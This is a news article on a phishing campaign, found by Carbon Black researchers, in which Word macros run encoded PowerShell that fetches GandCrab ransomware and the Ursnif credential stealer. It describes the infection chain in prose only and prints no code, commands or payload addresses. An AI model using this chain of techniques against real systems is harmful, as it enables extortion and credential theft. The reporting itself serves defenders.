Phishing Campaign Delivers Nasty Ransomware, Credential-Theft Two-Punch

Phishing Campaign Delivers Nasty Ransomware, Credential-Theft Two-Punch

A spate of phishing emails with Word attachments deliver both the Gandcrab ransomware and Ursnif executable.

An array of phishing emails harboring Word attachments with embedded macros have been infecting systems with a deadly malware and ransomware duo.

The campaign, spotted by researchers at Carbon Black, has hit infected systems with a lethal attack combination that harvests credentials, gathers system and process information, and then encrypts data in order to extort payments from victims.

The attack originally came in via phishing emails that contained an attached Word document with embedded macros. The macro would then call an encoded PowerShell script and use a series of techniques to download and execute both a Ursnif malware strain and GandCrab ransomware variant.

The campaign appears to have begun targeting victims on Dec. 17, Carbon Black researchers told Threatpost.  There have been a couple of different pockets of activity observed each week since then, they said.

“The campaign appears to be ongoing, as we are seeing additional payloads being posted on that are almost identical to the payloads that were leveraged to data extracted from our analysis of these samples,” Jared Myers, senior threat researcher for Carbon Black, told Threatpost.

The Attack

The initial phishing emails included a Microsoft Word document to deliver the early stages of the attack.

“The overall attack leverages several different approaches, which are popular techniques amongst red-teamers, espionage-focused adversaries and large-scale criminal campaigns,” said Carbon Black researchers in a Thursday analysis.

GandCrab ransomware phishing

Click to Expand.

These documents contained a VBS macro that, once decompressed, totaled approximately 650 lines of code.  Interestingly, the vast majority of that was junk code – and once that was removed, there were about 18 lines of relevant code.

 From there, a PowerShell script was downloaded and executed, which then contacted a hard-coded command-and-control (C2) address requesting two strings of code: the DownloadString method, which ultimately downloads the GandCrab ransomware, and the DownloadData method, which eventually downloads the Ursnif malware strain.

GandCrab ransomware has been spotted in several campaigns over the past year, including hidden on legitimate but compromised websites, and infecting victims via a December sextortion campaign.

“The first payload that is downloaded via the DownloadString method…is a PowerShell one-liner that uses an ‘if’ statement to evaluate the architecture of the compromised system, and then downloads a additional payload from  This additional payload is then executed in memory,” researchers said.

The  Ursnif executable meanwhile is downloaded from the DownloadData method, and then performs an array of malicious activities like credential harvesting, gathering system and process information, and deploying additional malware samples.

While no additional data is available on the number of victims in the campaign, Carbon Black researchers said that they have located roughly 180 Word document variants in the wild.

“We have not observed where any one particular malicious document was sent at a higher rate to potential victims than any other,” Myers told Threatpost. “However, the variants were presumably created in batches that were then sent to potential victims, so, depending on the effectiveness of the phishing emails, some may appear to be more successful than others.

Suggested articles